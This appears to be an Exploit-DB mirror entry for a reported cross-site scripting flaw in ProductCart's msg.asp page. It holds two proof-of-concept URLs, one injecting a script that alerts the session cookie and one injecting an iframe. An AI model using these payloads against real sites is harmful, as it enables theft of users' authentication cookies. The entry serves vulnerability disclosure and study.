exploit-db-mirror/exploits/asp/webapps/22866.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

11 lines
No EOL
543 B
Text

source: http://www.securityfocus.com/bid/8108/info
A cross-site scripting vulnerability has been reported for ProductCart. The vulnerability exists due to insufficient sanitization of some user-supplied values.
Exploitation could permit an attacker to steal cookie-based authentication credentials or launch other attacks.
http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert
(document.cookie);</script>
http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
20width=400%20height=400></iframe>